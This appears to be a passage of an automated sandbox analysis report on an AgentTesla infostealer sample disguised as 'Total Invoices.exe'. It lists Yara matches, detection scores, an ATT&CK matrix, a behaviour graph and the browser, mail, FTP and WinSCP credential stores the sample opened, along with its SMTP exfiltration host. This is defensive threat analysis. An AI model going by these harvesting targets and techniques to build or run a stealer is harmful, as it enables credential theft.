                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeQueries volume information: C:\Users\user\AppData\Roaming\dWXyZYb.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Total Invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1804990629.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7372, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7780, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7372, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7780, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4ebf748.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.4055278.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4efa768.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.401a258.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4efa768.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.4055278.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Total Invoices.exe.4ebf748.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.dWXyZYb.exe.401a258.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1804990629.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7372, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7780, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Non-Application Layer Protocol                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		211
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		Protocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                      Process Injection                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Hidden Files and Directories                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430700 Sample: Total Invoices.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 53 mail.unitechautomations.com 2->53 57 Snort IDS alert for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 12 other signatures 2->63 8 Total Invoices.exe 7 2->8         started        12 dWXyZYb.exe 5 2->12         started        14 GUIVTme.exe 2->14         started        16 GUIVTme.exe 2->16         started        signatures3 process4 file5 49 C:\Users\user\AppData\Roaming\dWXyZYb.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\...\tmp3C54.tmp, XML 8->51 dropped 79 Writes to foreign memory regions 8->79 81 Allocates memory in foreign processes 8->81 83 Adds a directory exclusion to Windows Defender 8->83 18 RegSvcs.exe 1 4 8->18         started        23 powershell.exe 23 8->23         started        25 powershell.exe 23 8->25         started        27 schtasks.exe 1 8->27         started        85 Multi AV Scanner detection for dropped file 12->85 87 Machine Learning detection for dropped file 12->87 89 Injects a PE file into a foreign processes 12->89 29 RegSvcs.exe 12->29         started        31 schtasks.exe 12->31         started        33 conhost.exe 14->33         started        35 conhost.exe 16->35         started        signatures6 process7 dnsIp8 55 mail.unitechautomations.com 192.185.129.60, 49735, 49736, 587 UNIFIEDLAYER-AS-1US United States 18->55 47 C:\Users\user\AppData\Roaming\...behaviorgraphUIVTme.exe, PE32 18->47 dropped 65 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->65 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->67 69 Loading BitLocker PowerShell Module 23->69 37 conhost.exe 23->37         started        39 WmiPrvSE.exe 23->39         started        41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        71 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->71 73 Tries to steal Mail credentials (via file / registry access) 29->73 75 Tries to harvest and steal ftp login credentials 29->75 77 Tries to harvest and steal browser information (history, passwords, etc) 29->77 45 conhost.exe 31->45         started        file9 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Total Invoices.exe61%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                      Total Invoices.exe32%VirustotalBrowse
                      Total Invoices.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\dWXyZYb.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe0%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\dWXyZYb.exe61%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                      C:\Users\user\AppData\Roaming\dWXyZYb.exe32%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.unitechautomations.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://mail.unitechautomations.com0%Avira URL Cloudsafe
                      http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                      http://mail.unitechautomations.com1%VirustotalBrowse
                      http://tempuri.org/DataSet1.xsd2%VirustotalBrowse
                      http://www.founder.com.cn/cn0%VirustotalBrowse
                      http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                      http://www.zhongyicts.com.cn1%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.unitechautomations.com
                      		192.185.129.60
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
